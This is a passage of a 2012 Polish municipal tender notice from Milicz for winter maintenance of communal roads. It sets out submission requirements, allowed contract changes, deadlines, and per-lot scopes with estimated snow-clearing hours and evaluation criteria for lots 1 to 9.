</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wraz z ofertą składane są następujące dokumenty i załączniki:
1) wypełniony i podpisany Formularz ofertowy z wykorzystaniem wzoru - Załącznik Nr 1 do Specyfikacji,
2) oświadczenie o spełnieniu warunków udziału w postępowaniu wg wzoru z Załącznika Nr 2 do Specyfikacji.
Postanowienia dotyczące wnoszenia oferty wspólnej przez dwa lub więcej podmiotów:
1) Wykonawcy zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia lub do reprezentowania ich w postępowaniu i zawarcia umowy; dokument pełnomocnictwa sporządzony zgodnie z przepisami prawa, winien być dołączony do oferty;
2) oferta winna być podpisana przez każdego uczestnika konsorcjum lub ustanowionego pełnomocnika;
3) oferta winna zawierać wszystkie dokumenty, oświadczenia i informacje wymienione w punkcie III.4.2) niniejszego ogłoszenia, dla każdego uczestnika konsorcjum z osobna, pozostałe zaś składane są wspólnie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość dokonywania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, na podstawie art. 144 ust. 1 Ustawy w następujących przypadkach:
a) wystąpienia okoliczności, które zaistniały niezależnie od Wykonawcy, bądź Zamawiającego, a których Strony przy dołożeniu należytej staranności nie mogły w dniu podpisywania Umowy przewidzieć ani im zapobiec (przykładowe okoliczności):
 - siła wyższa,
- katastrofy naturalne,
- nadzwyczajne zjawiska pogodowe np. znaczne opady atmosferyczne,
- zamieszki społeczne,
- sprzeczne z przepisami działania osób trzecich itp.;
b) zmiany stawki podatku od towarów i usług (VAT) na usługi określone w przedmiocie zamówienia, czego następstwem będzie zmiana wynagrodzenia umownego brutto.
c) zmiany kluczowego personelu Wykonawcy i Zamawiającego - w szczególności osób nadzorujących prowadzenie prac;
d) zmiany zakresie  powierzenia podwykonawcom innej części robót niż wskazana w ofercie Wykonawcy;
2.W przypadkach wskazanych w punkcie 1  strona dążąca do zmiany umowy każdorazowo obowiązana jest przedstawić na piśmie argumenty przemawiające za dokonaniem zmian do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.milicz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.bip.milicz.pl lub Urząd Miejski w Miliczu, ul. Trzebnicka 2, 56-300 Milicz, do pok. nr 58,  w cenie 10,00 zł, na wniosek oferenta zgodnie z art. 42 ust. 2 ustawy z dnia 29.01.2004 r. Pzp.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.11.2012 godzina 10:00, miejsce: Urząd Miejski w Miliczu, ul. Trzebnicka 2, 56-300 Milicz, pok. nr 15 (Punkt Obsługi Mieszkańców), otwarcie ofert: 29.11.2012 , do godz. 10:30, sala nr 4 (na parterze).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część 1 - Obwód 1 teren miasta Milicza.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający przewiduje możliwość złożenia oferty przez jednego Wykonawcę na jedną lub dowolnie wybraną ilość Części zamówienia.
Zamawiający zastrzega sobie prawo do wyboru najkorzystniejszej oferty w zakresie każdej części zamówienia osobno. Zamawiający przewiduje możliwość złożenia oferty przez jednego Wykonawcę na jedną lub dowolnie wybraną ilość części zamówienia
Zamawiający przewiduje możliwość złożenia oferty przez jednego Wykonawcę na jedną lub dowolnie wybraną ilość Części zamówienia.
Zamawiający zastrzega sobie prawo do wyboru najkorzystniejszej oferty w zakresie każdej części zamówienia osobno. Zamawiający przewiduje możliwość złożenia oferty przez jednego Wykonawcę na jedną lub dowolnie wybraną ilość części zamówienia
1.Zakres prac:
1)Zimowe utrzymanie dróg gminnych na terenie Gminy Milicz polega na:
-usuwaniu z jezdni śniegu, zasp, błota pośniegowego i języków śniegowych,
-likwidowaniu śliskości powstałej na skutek gołoledzi, śniegu, szadzi, szronu i lodowicy to znaczy odśnieżaniu i posypywaniu mieszanką piaskowo-solną dróg, placów, parkingów, alejek parkowych i ciągów pieszych ze szczególnym uwzględnieniem zejść do przejść dla pieszych zgodnie z opracowanym planem Akcji Zima (wykazem dróg),
-zgromadzeniu we własnym zakresie i na własny koszt odpowiednich ilości środków tj. 15% mieszanki piaskowo-solnej dla sprawnego przeprowadzenia Akcji Zima, wg potrzeb, zarówno w dni robocze, jak też w dni wolne od pracy w sezonie zimowym 2012/2013.
-Wykonawca jest zobowiązany do podania miejsca składowania mieszanki w celu sprawdzenia ilości i jakości
2)Zamówienie obejmuje wywozu śniegu i błota pośniegowego z granic pasa drogowego w szczególnie uzasadnionych przypadkach (każdorazowo określonych przez Zamawiającego). 
3)Szacunkowe ilości dla Części 1 wynoszą: 
a)170 godziny pomnożone przez cenę jednostkową za 1 godzinę odśnieżania - WARIANT I podawane w formularzu ofertowym (Zał. nr 1 do Specyfikacji) przez Wykonawcę,
b)237 godziny pomnożone przez cenę jednostkową za 1 godzinę odśnieżania z posypywaniem - WARIANT II podawaną w formularzu ofertowym (Zał. nr 1 do Specyfikacji) przez Wykonawcę,
c)181 m3 pomnożoną  przez cenę jednostkową za 1 m3 wywiezionego śniegu - WARIANT III podawaną w formularzu ofertowym (Zał. nr 1 do Specyfikacji) przez Wykonawcę,
4)Szacunkowe ilości dla Części 2 wynoszą:
a)284 godziny pomnożone przez cenę jednostkową za 1 godzinę odśnieżania - WARIANT I podawaną w formularzu ofertowym (Zał. nr 1 do Specyfikacji) przez Wykonawcę,
b)175 godziny pomnożone przez cenę jednostkową za 1 godzinę odśnieżania z posypywaniem - WARIANT II, podawaną w formularzu ofertowym (Zał. nr 1 do Specyfikacji) przez Wykonawcę;
5)Wykonawca zobowiązany jest do stałego współdziałania z Zakładem Usług Komunalnych w Miliczu koordynującym Części nr 1 i 2 Akcji Zima. 
6)Raporty pracy dziennej dotyczące Części nr 1 i 2 winny być zgłaszane codziennie u kierującego Akcją Zima w siedzibie Zakładu Usług Komunalnych w Miliczu ul Osiedle 35, 56-300 Milicz, w godzinach pracy tj. od 7.00 do 15.00.
2.Standard utrzymania dróg:
Przyjmuje się następujące standardy zimowego utrzymania dróg Gminy Milicz dla Części nr 1 i Części nr 2 (zgodnie z zarządzeniem nr 46 Ministra Transportu i Gospodarki Morskiej z dnia 24 października 1994r. w sprawie zasad odśnieżania i usuwania gołoledzi na drogach publicznych - Dziennik Urzędowy MTiGM z 25.10.1994 Nr 10, poz.  20) :
-GRUPA 1 standard IV
-skrzyżowania z drogą krajową ulic: Powstańców  Wielkopolskich, Akacjowej, Grota Roweckiego
-ulice: Kopernika, Mickiewicza, Grzybowa, Ks. Waresiaka, pl. Ks. Waresiaka, Wrocławska, 1-go Maja, Garncarska, Szewska (do Krotoszyńskiej), Kościuszki, Grunwaldzka, Armii Krajowej, 11 - tego Listopada, Grota Roweckiego
-GRUPA 2 standard V
- pozostałe  utwardzone (bitumiczne lub z kostki brukowej) ulice i drogi gminne. 
-GRUPA 3 standard VI - drogi gminne gruntowe- włącznie dojazdy do zabudowań.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.62.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część 2 - Obwód 2 tereny wiejskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający przewiduje możliwość złożenia oferty przez jednego Wykonawcę na jedną lub dowolnie wybraną ilość Części zamówienia.
Zamawiający zastrzega sobie prawo do wyboru najkorzystniejszej oferty w zakresie każdej części zamówienia osobno. Zamawiający przewiduje możliwość złożenia oferty przez jednego Wykonawcę na jedną lub dowolnie wybraną ilość części zamówienia
Zamawiający przewiduje możliwość złożenia oferty przez jednego Wykonawcę na jedną lub dowolnie wybraną ilość Części zamówienia.
Zamawiający zastrzega sobie prawo do wyboru najkorzystniejszej oferty w zakresie każdej części zamówienia osobno. Zamawiający przewiduje możliwość złożenia oferty przez jednego Wykonawcę na jedną lub dowolnie wybraną ilość części zamówienia
1.Zakres prac:
1)Zimowe utrzymanie dróg gminnych na terenie Gminy Milicz polega na:
-usuwaniu z jezdni śniegu, zasp, błota pośniegowego i języków śniegowych,
-likwidowaniu śliskości powstałej na skutek gołoledzi, śniegu, szadzi, szronu i lodowicy to znaczy odśnieżaniu i posypywaniu mieszanką piaskowo-solną dróg, placów, parkingów, alejek parkowych i ciągów pieszych ze szczególnym uwzględnieniem zejść do przejść dla pieszych zgodnie z opracowanym planem Akcji Zima (wykazem dróg),
-zgromadzeniu we własnym zakresie i na własny koszt odpowiednich ilości środków tj. 15% mieszanki piaskowo-solnej dla sprawnego przeprowadzenia Akcji Zima, wg potrzeb, zarówno w dni robocze, jak też w dni wolne od pracy w sezonie zimowym 2012/2013.
-Wykonawca jest zobowiązany do podania miejsca składowania mieszanki w celu sprawdzenia ilości i jakości
2)Zamówienie obejmuje wywozu śniegu i błota pośniegowego z granic pasa drogowego w szczególnie uzasadnionych przypadkach (każdorazowo określonych przez Zamawiającego). 
3)Szacunkowe ilości dla Części 1 wynoszą: 
a)170 godziny pomnożone przez cenę jednostkową za 1 godzinę odśnieżania - WARIANT I podawane w formularzu ofertowym (Zał. nr 1 do Specyfikacji) przez Wykonawcę,
b)237 godziny pomnożone przez cenę jednostkową za 1 godzinę odśnieżania z posypywaniem - WARIANT II podawaną w formularzu ofertowym (Zał. nr 1 do Specyfikacji) przez Wykonawcę,
c)181 m3 pomnożoną  przez cenę jednostkową za 1 m3 wywiezionego śniegu - WARIANT III podawaną w formularzu ofertowym (Zał. nr 1 do Specyfikacji) przez Wykonawcę,
4)Szacunkowe ilości dla Części 2 wynoszą:
a)284 godziny pomnożone przez cenę jednostkową za 1 godzinę odśnieżania - WARIANT I podawaną w formularzu ofertowym (Zał. nr 1 do Specyfikacji) przez Wykonawcę,
b)175 godziny pomnożone przez cenę jednostkową za 1 godzinę odśnieżania z posypywaniem - WARIANT II, podawaną w formularzu ofertowym (Zał. nr 1 do Specyfikacji) przez Wykonawcę;
5)Wykonawca zobowiązany jest do stałego współdziałania z Zakładem Usług Komunalnych w Miliczu koordynującym Części nr 1 i 2 Akcji Zima. 
6)Raporty pracy dziennej dotyczące Części nr 1 i 2 winny być zgłaszane codziennie u kierującego Akcją Zima w siedzibie Zakładu Usług Komunalnych w Miliczu ul Osiedle 35, 56-300 Milicz, w godzinach pracy tj. od 7.00 do 15.00.
2.Standard utrzymania dróg:
Przyjmuje się następujące standardy zimowego utrzymania dróg Gminy Milicz dla Części nr 1 i Części nr 2 (zgodnie z zarządzeniem nr 46 Ministra Transportu i Gospodarki Morskiej z dnia 24 października 1994r. w sprawie zasad odśnieżania i usuwania gołoledzi na drogach publicznych - Dziennik Urzędowy MTiGM z 25.10.1994 Nr 10, poz.  20) :
-GRUPA 1 standard IV
-skrzyżowania z drogą krajową ulic: Powstańców  Wielkopolskich, Akacjowej, Grota Roweckiego
-ulice: Kopernika, Mickiewicza, Grzybowa, Ks. Waresiaka, pl. Ks. Waresiaka, Wrocławska, 1-go Maja, Garncarska, Szewska (do Krotoszyńskiej), Kościuszki, Grunwaldzka, Armii Krajowej, 11 - tego Listopada, Grota Roweckiego
-GRUPA 2 standard V
- pozostałe  utwardzone (bitumiczne lub z kostki brukowej) ulice i drogi gminne. 
-GRUPA 3 standard VI - drogi gminne gruntowe- włącznie dojazdy do zabudowań.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.62.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część 3 - Obwód 3 sołectwo Gądkowice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający przewiduje możliwość złożenia oferty przez jednego Wykonawcę na jedną lub dowolnie wybraną ilość Części zamówienia.
Zamawiający zastrzega sobie prawo do wyboru najkorzystniejszej oferty w zakresie każdej części zamówienia osobno. Zamawiający przewiduje możliwość złożenia oferty przez jednego Wykonawcę na jedną lub dowolnie wybraną ilość części zamówienia.
Wykonawca zobowiązany jest do stałego współdziałania  w przypadku Części nr 3, 4, 5, 6, 7, 8, 9, 10, 11 z sołtysami poszczególnych wiosek a w szczególności:
-Wykonawca przystąpi do wykonywania przedmiotu umowy niezwłocznie po telefonicznym wezwaniu przez Sołtysa lub samoistnie, niezwłocznie (telefonicznie) zawiadamiając o powyższym Sołtysa. 
-Podstawą ustalenia ilości godzin wykonywania przedmiotu umowy jest zatwierdzona przez Sołtysa dzienna ewidencja wykonanych usług prowadzona przez Wykonawcę według wzoru określonego w Załączniku nr 4  do umowy.
- Wykonawca przedłoży Sołtysowi do zatwierdzenia dzienną ewidencję wykonanych usług nie później niż w ciągu 2 dni od dnia realizacji przedmiotu umowy w danym dniu.  Sołtys potwierdza wykonanie przedmiotu umowy na ewidencji.
-Wynagrodzenia Wykonawcy płatne jest miesięcznie z dołu, na podstawie wszystkich zatwierdzonych przez Sołtysa w tym miesiącu dziennych ewidencji czasu pracy,
- Szacunkowe ilości godzin odśnieżania dla Części 3-11 wynoszą odpowiednio:
Części   Ogółem
3 - Gądkowice - 73 h
4- Godnowa -56h
5 - Gogołowice -	58 h
6- Olsza -	21h
7- Pracze -76h
8- Wodników Górny -39h 
9- Ruda Sułowska	-23h
10 - Nowy Zamek - 80h
11-Wrocławice -	97h 
pomnożone przez cenę jednostkową za 1 godzinę odśnieżania ramach każdej z Części 3-11 (w przypadku Części 10 z posypywaniem) podawaną w formularzu ofertowym (Zał. nr 1 do Specyfikacji) przez Wykonawcę.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.62.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. czas przejechania 1 km przy odśnieżaniu - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część 4 - Obwód 4 sołectwo Godnowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający przewiduje możliwość złożenia oferty przez jednego Wykonawcę na jedną lub dowolnie wybraną ilość Części zamówienia.
Zamawiający zastrzega sobie prawo do wyboru najkorzystniejszej oferty w zakresie każdej części zamówienia osobno. Zamawiający przewiduje możliwość złożenia oferty przez jednego Wykonawcę na jedną lub dowolnie wybraną ilość części zamówienia.
Wykonawca zobowiązany jest do stałego współdziałania  w przypadku Części nr 3, 4, 5, 6, 7, 8, 9, 10, 11 z sołtysami poszczególnych wiosek a w szczególności:
-Wykonawca przystąpi do wykonywania przedmiotu umowy niezwłocznie po telefonicznym wezwaniu przez Sołtysa lub samoistnie, niezwłocznie (telefonicznie) zawiadamiając o powyższym Sołtysa. 
-Podstawą ustalenia ilości godzin wykonywania przedmiotu umowy jest zatwierdzona przez Sołtysa dzienna ewidencja wykonanych usług prowadzona przez Wykonawcę według wzoru określonego w Załączniku nr 4  do umowy.
- Wykonawca przedłoży Sołtysowi do zatwierdzenia dzienną ewidencję wykonanych usług nie później niż w ciągu 2 dni od dnia realizacji przedmiotu umowy w danym dniu.  Sołtys potwierdza wykonanie przedmiotu umowy na ewidencji.
-Wynagrodzenia Wykonawcy płatne jest miesięcznie z dołu, na podstawie wszystkich zatwierdzonych przez Sołtysa w tym miesiącu dziennych ewidencji czasu pracy,
- Szacunkowe ilości godzin odśnieżania dla Części 3-11 wynoszą odpowiednio:
Części   Ogółem
3 - Gądkowice - 73 h
4- Godnowa -56h
5 - Gogołowice -	58 h
6- Olsza -	21h
7- Pracze -76h
8- Wodników Górny -39h 
9- Ruda Sułowska	-23h
10 - Nowy Zamek - 80h
11-Wrocławice -	97h 
pomnożone przez cenę jednostkową za 1 godzinę odśnieżania ramach każdej z Części 3-11 (w przypadku Części 10 z posypywaniem) podawaną w formularzu ofertowym (Zał. nr 1 do Specyfikacji) przez Wykonawcę.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.62.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. czas przejechania 1km przy odśnieżaniu - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część 5 - Obwód 5 sołectwo Gogołowice.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający przewiduje możliwość złożenia oferty przez jednego Wykonawcę na jedną lub dowolnie wybraną ilość Części zamówienia.
Zamawiający zastrzega sobie prawo do wyboru najkorzystniejszej oferty w zakresie każdej części zamówienia osobno. Zamawiający przewiduje możliwość złożenia oferty przez jednego Wykonawcę na jedną lub dowolnie wybraną ilość części zamówienia.
Wykonawca zobowiązany jest do stałego współdziałania  w przypadku Części nr 3, 4, 5, 6, 7, 8, 9, 10, 11 z sołtysami poszczególnych wiosek a w szczególności:
-Wykonawca przystąpi do wykonywania przedmiotu umowy niezwłocznie po telefonicznym wezwaniu przez Sołtysa lub samoistnie, niezwłocznie (telefonicznie) zawiadamiając o powyższym Sołtysa. 
-Podstawą ustalenia ilości godzin wykonywania przedmiotu umowy jest zatwierdzona przez Sołtysa dzienna ewidencja wykonanych usług prowadzona przez Wykonawcę według wzoru określonego w Załączniku nr 4  do umowy.
- Wykonawca przedłoży Sołtysowi do zatwierdzenia dzienną ewidencję wykonanych usług nie później niż w ciągu 2 dni od dnia realizacji przedmiotu umowy w danym dniu.  Sołtys potwierdza wykonanie przedmiotu umowy na ewidencji.
-Wynagrodzenia Wykonawcy płatne jest miesięcznie z dołu, na podstawie wszystkich zatwierdzonych przez Sołtysa w tym miesiącu dziennych ewidencji czasu pracy,
- Szacunkowe ilości godzin odśnieżania dla Części 3-11 wynoszą odpowiednio:
Części   Ogółem
3 - Gądkowice - 73 h
4- Godnowa -56h
5 - Gogołowice -	58 h
6- Olsza -	21h
7- Pracze -76h
8- Wodników Górny -39h 
9- Ruda Sułowska	-23h
10 - Nowy Zamek - 80h
11-Wrocławice -	97h 
pomnożone przez cenę jednostkową za 1 godzinę odśnieżania ramach każdej z Części 3-11 (w przypadku Części 10 z posypywaniem) podawaną w formularzu ofertowym (Zał. nr 1 do Specyfikacji) przez Wykonawcę.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.62.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. czas przejechania 1km przy odśnieżaniu - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Część 6 - Obwód 6 sołectwo Olsza.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający przewiduje możliwość złożenia oferty przez jednego Wykonawcę na jedną lub dowolnie wybraną ilość Części zamówienia.
Zamawiający zastrzega sobie prawo do wyboru najkorzystniejszej oferty w zakresie każdej części zamówienia osobno. Zamawiający przewiduje możliwość złożenia oferty przez jednego Wykonawcę na jedną lub dowolnie wybraną ilość części zamówienia.
Wykonawca zobowiązany jest do stałego współdziałania  w przypadku Części nr 3, 4, 5, 6, 7, 8, 9, 10, 11 z sołtysami poszczególnych wiosek a w szczególności:
-Wykonawca przystąpi do wykonywania przedmiotu umowy niezwłocznie po telefonicznym wezwaniu przez Sołtysa lub samoistnie, niezwłocznie (telefonicznie) zawiadamiając o powyższym Sołtysa. 
-Podstawą ustalenia ilości godzin wykonywania przedmiotu umowy jest zatwierdzona przez Sołtysa dzienna ewidencja wykonanych usług prowadzona przez Wykonawcę według wzoru określonego w Załączniku nr 4  do umowy.
- Wykonawca przedłoży Sołtysowi do zatwierdzenia dzienną ewidencję wykonanych usług nie później niż w ciągu 2 dni od dnia realizacji przedmiotu umowy w danym dniu.  Sołtys potwierdza wykonanie przedmiotu umowy na ewidencji.
-Wynagrodzenia Wykonawcy płatne jest miesięcznie z dołu, na podstawie wszystkich zatwierdzonych przez Sołtysa w tym miesiącu dziennych ewidencji czasu pracy,
- Szacunkowe ilości godzin odśnieżania dla Części 3-11 wynoszą odpowiednio:
Części   Ogółem
3 - Gądkowice - 73 h
4- Godnowa -56h
5 - Gogołowice -	58 h
6- Olsza -	21h
7- Pracze -76h
8- Wodników Górny -39h 
9- Ruda Sułowska	-23h
10 - Nowy Zamek - 80h
11-Wrocławice -	97h 
pomnożone przez cenę jednostkową za 1 godzinę odśnieżania ramach każdej z Części 3-11 (w przypadku Części 10 z posypywaniem) podawaną w formularzu ofertowym (Zał. nr 1 do Specyfikacji) przez Wykonawcę.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.62.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. czas przejechania 1km przy odśnieżaniu - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Część 7 - Obwód 7 sołectwo Pracze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający przewiduje możliwość złożenia oferty przez jednego Wykonawcę na jedną lub dowolnie wybraną ilość Części zamówienia.
Zamawiający zastrzega sobie prawo do wyboru najkorzystniejszej oferty w zakresie każdej części zamówienia osobno. Zamawiający przewiduje możliwość złożenia oferty przez jednego Wykonawcę na jedną lub dowolnie wybraną ilość części zamówienia.
Wykonawca zobowiązany jest do stałego współdziałania  w przypadku Części nr 3, 4, 5, 6, 7, 8, 9, 10, 11 z sołtysami poszczególnych wiosek a w szczególności:
-Wykonawca przystąpi do wykonywania przedmiotu umowy niezwłocznie po telefonicznym wezwaniu przez Sołtysa lub samoistnie, niezwłocznie (telefonicznie) zawiadamiając o powyższym Sołtysa. 
-Podstawą ustalenia ilości godzin wykonywania przedmiotu umowy jest zatwierdzona przez Sołtysa dzienna ewidencja wykonanych usług prowadzona przez Wykonawcę według wzoru określonego w Załączniku nr 4  do umowy.
- Wykonawca przedłoży Sołtysowi do zatwierdzenia dzienną ewidencję wykonanych usług nie później niż w ciągu 2 dni od dnia realizacji przedmiotu umowy w danym dniu.  Sołtys potwierdza wykonanie przedmiotu umowy na ewidencji.
-Wynagrodzenia Wykonawcy płatne jest miesięcznie z dołu, na podstawie wszystkich zatwierdzonych przez Sołtysa w tym miesiącu dziennych ewidencji czasu pracy,
- Szacunkowe ilości godzin odśnieżania dla Części 3-11 wynoszą odpowiednio:
Części   Ogółem
3 - Gądkowice - 73 h
4- Godnowa -56h
5 - Gogołowice -	58 h
6- Olsza -	21h
7- Pracze -76h
8- Wodników Górny -39h 
9- Ruda Sułowska	-23h
10 - Nowy Zamek - 80h
11-Wrocławice -	97h 
pomnożone przez cenę jednostkową za 1 godzinę odśnieżania ramach każdej z Części 3-11 (w przypadku Części 10 z posypywaniem) podawaną w formularzu ofertowym (Zał. nr 1 do Specyfikacji) przez Wykonawcę.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.62.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. czas przejechania 1km przy odśnieżaniu - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Cześć 8 -Obwód 8 sołectwo Wodników Górny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający przewiduje możliwość złożenia oferty przez jednego Wykonawcę na jedną lub dowolnie wybraną ilość Części zamówienia.
Zamawiający zastrzega sobie prawo do wyboru najkorzystniejszej oferty w zakresie każdej części zamówienia osobno. Zamawiający przewiduje możliwość złożenia oferty przez jednego Wykonawcę na jedną lub dowolnie wybraną ilość części zamówienia.
Wykonawca zobowiązany jest do stałego współdziałania  w przypadku Części nr 3, 4, 5, 6, 7, 8, 9, 10, 11 z sołtysami poszczególnych wiosek a w szczególności:
-Wykonawca przystąpi do wykonywania przedmiotu umowy niezwłocznie po telefonicznym wezwaniu przez Sołtysa lub samoistnie, niezwłocznie (telefonicznie) zawiadamiając o powyższym Sołtysa. 
-Podstawą ustalenia ilości godzin wykonywania przedmiotu umowy jest zatwierdzona przez Sołtysa dzienna ewidencja wykonanych usług prowadzona przez Wykonawcę według wzoru określonego w Załączniku nr 4  do umowy.
- Wykonawca przedłoży Sołtysowi do zatwierdzenia dzienną ewidencję wykonanych usług nie później niż w ciągu 2 dni od dnia realizacji przedmiotu umowy w danym dniu.  Sołtys potwierdza wykonanie przedmiotu umowy na ewidencji.
-Wynagrodzenia Wykonawcy płatne jest miesięcznie z dołu, na podstawie wszystkich zatwierdzonych przez Sołtysa w tym miesiącu dziennych ewidencji czasu pracy,
- Szacunkowe ilości godzin odśnieżania dla Części 3-11 wynoszą odpowiednio:
Części   Ogółem
3 - Gądkowice - 73 h
4- Godnowa -56h
5 - Gogołowice -	58 h
6- Olsza -	21h
7- Pracze -76h
8- Wodników Górny -39h 
9- Ruda Sułowska	-23h
10 - Nowy Zamek - 80h
11-Wrocławice -	97h 
pomnożone przez cenę jednostkową za 1 godzinę odśnieżania ramach każdej z Części 3-11 (w przypadku Części 10 z posypywaniem) podawaną w formularzu ofertowym (Zał. nr 1 do Specyfikacji) przez Wykonawcę.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-6, 90.62.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. czas przejechania 1km przy odśnieżaniu - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Część 9 -Obwód 9 sołectwo Ruda Sułowska.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamawiający przewiduje możliwość złożenia oferty przez jednego Wykonawcę na jedną lub dowolnie wybraną ilość Części zamówienia.
